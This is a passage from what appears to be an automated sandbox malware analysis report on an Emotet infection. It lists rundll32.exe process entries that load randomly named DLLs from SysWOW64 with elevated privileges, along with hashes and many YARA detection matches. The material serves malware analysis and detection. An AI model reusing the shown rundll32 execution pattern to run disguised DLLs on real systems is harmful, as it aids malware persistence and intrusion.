                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:13
                                  Start time:21:02:22
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Target ID:14
                                  Start time:21:02:35
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                  General

                                  Target ID:15
                                  Start time:21:02:39
                                  Start date:28/01/2022
                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                                  Imagebase:0x650000
                                  File size:44544 bytes
                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                  Disassembly

                                  No disassembly